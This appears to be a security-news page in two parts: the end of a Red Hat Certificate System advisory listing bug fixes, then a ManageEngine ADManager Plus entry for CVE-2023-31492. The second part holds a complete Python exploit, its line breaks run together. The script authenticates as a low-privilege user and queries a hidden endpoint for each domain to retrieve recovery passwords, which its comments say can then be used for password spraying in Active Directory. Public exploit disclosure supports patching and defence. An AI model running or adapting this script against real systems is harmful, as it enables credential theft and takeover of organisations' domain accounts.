* Date Format on the TPS Agent Page (BZ#1984455)

* Directory authentication plugin requires directory admin password just for user authentication (BZ#2017505) 

* Add SCEP AES support (BZ#2075363)

* JSS cannot be properly initialized after using another NSS-backed security provider (BZ#2087224) 

* Empty subject field in CSR causes failure to certificate issuance (BZ#2105471)

* RA Separation by KeyType - Set Token Status (BZ#2106153)

* Disallowed \"supported_groups\" in TLS1.2 key exchange (BZ#2113782)

* Some unsusable profiles are present in CA's EE page (BZ#2118662)

* ClientIP and ServerIP are missing in ACCESS_SESSION_ESTABLISH/ACCESS_SESSION_TERMINATED Audit Event when PKI is acting as a Server (BZ#2122502)

* add AES support for TMS server-side keygen on latest HSM / FIPS environment (BZ#2123071)

* CA's Key Escrow is Failing Through httpd Reverse Proxy (BZ#2130250)

* Provide Enrollment over Secure Transport / EST interface to Dogtag / RFC 7030 to support SCEP over EST (BZ#2142893)

* DHE ciphers not working (dropping DHE ciphersuites) (BZ#2142903) 

* pkiconsole unable to connect pki servers that's in fips mode with client cert (BZ#2142904)

* KRA and OCSP display banner prompts during pkispawn (BZ#2142905) 

* missing audit event CLIENT_ACCESS_SESSION_ESTABLISH when CS instance acting as a client and fails to connect (BZ#2142906)

* EST prep work (BZ#2142907)

* add AES support for TMS Shared Secret on latest HSM / FIPS environment (BZ#2142908)

* CS instance when acting as a client does not observe the cipher list set in server.xml (BZ#2142909) 

* OCSP using AIA extension fails (BZ#2144080)

* Lightweight CA: Add support for multiple sub-CAs underneath primary CA (BZ#2149115) 

* TPS Not allowing Token Status Change based on Revoke True/False and Hold till last True/False (BZ#2166003)

* Unable to use the TPS UI \"Token Filter\" to filter a list of tokens (BZ#2179307)

* TPS Not allowing Token Status Change based on Revoke True/False and Hold till last True/False (part 2) (BZ#2181142)

* root CA signing cert should not have AIA extension (BZ#2182201)

* PrettyPrintCert does not properly translate AIA information into a readable format (BZ#2184930)

* OCSP AddCRLServlet \"SEVERE...NOT SUPPORTED\" log messages (BZ#2190283)

* PrettyPrintCert does not properly translate Subject Information Access information into a readable format (BZ#2209624)

* OCSP Responder not responding to certs issued by unknown CAs (BZ#2221818)

* pkispawn non-CA pki instance result in TLS client-authentication to its internaldb not finding pkidbuser by default (BZ#2228209)

* pkispawn externally signed sub CA clone with Thales Luna HSM fails: UNKNOWN_ISSUER (BZ#2228922)

* OCSP responder to serve status check for itself using latest CRL (BZ#2229930)

* RHCS Fails to Upgrade if Profile Does not exist (BZ#2230102)

* CLIENT_ACCESS_SESSION_* audit events contain wrong ServerPort (BZ#2233740)

* Server-side Key Generation Produces Certificates with Identical SKID (BZ#2246422)

* Generating Keys with no OpsFlagMask set - ThalesHSM integration (BZ#2251981)

* RootCA's OCSP fails to install with the SHA-2 subjectKeyIdentifier extension (BZ#2253044)

* Make key wrapping algorithm configurable between AES-KWP and AES-CBC (BZ#2253675)

* pkidestroy log keeps HSM token password (BZ#2253683)

Users of RHCS 10 are advised to upgrade to these updated packages.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-4213

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2042900

Red Hat Security Advisory 2024-0774-03

ManageEngine ADManager Plus versions prior to build 7183 suffers from a recovery password disclosure vulnerability.

    # Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure# Exploit Author: Metin Yunus Kandemir# Vendor Homepage: https://www.manageengine.com/# Software Link: https://www.manageengine.com/products/ad-manager/# Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md# Version: ADManager Plus Build < 7183# Tested against: Build 7180# CVE: CVE-2023-31492import argparseimport requestsimport urllib3import sys"""The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. When deleted user accounts are restored, defined password is set to the user accounts. Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment."""urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def getPass(target, auth, user, password):    with requests.Session() as s:        if auth.lower() == 'admanager':            auth = 'ADManager Plus Authentication'        data = {            "is_admp_pass_encrypted": "false",            "j_username": user,            "j_password": password,            "domainName": auth,            "AUTHRULE_NAME": "ADAuthenticator"        }        # Login        url = target + 'j_security_check?LogoutFromSSO=true'        headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",            "Content-Type": "application/x-www-form-urlencoded"        }        req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)        if 'Cookie' in req.request.headers:            print('[+] Authentication successful!')        elif req.status_code == 200:            print('[-] Invalid login name/password!')            sys.exit(0)        else:            print('[-] Something went wrong!')            sys.exit(1)        # Fetching recovery password        for i in range(1, 6):            print('[*] Trying to fetch recovery password for domainId: %s !' % i)            passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D'            passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False)            if passReq.content:                print(passReq.content)def main():    arg = get_args()    target = arg.target    auth = arg.auth    user = arg.user    password = arg.password    getPass(target, auth, user, password)def get_args():    parser = argparse.ArgumentParser(        epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')    parser.add_argument('-a', '--auth', required=True, action='store',                        help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.')    parser.add_argument('-u', '--user', required=True, action='store')    parser.add_argument('-p', '--password', required=True, action='store')    args = parser.parse_args()    return argsmain()

Tag

#auth